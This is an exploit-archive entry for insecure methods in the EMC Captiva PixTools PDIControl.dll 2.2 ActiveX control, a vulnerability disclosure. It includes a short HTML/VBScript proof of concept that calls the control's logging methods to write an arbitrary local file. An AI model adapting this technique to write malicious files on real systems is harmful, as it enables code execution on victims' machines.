EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities

2009-10-01T00:00:00
ID EXPLOITPACK:15132D39328C0D3319488F23F8F56DC7
Type exploitpack
Reporter Giuseppe Fuggiano
Modified 2009-10-01T00:00:00

Description

EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/36566/info

The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll).

Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution.

PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected. 

<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script>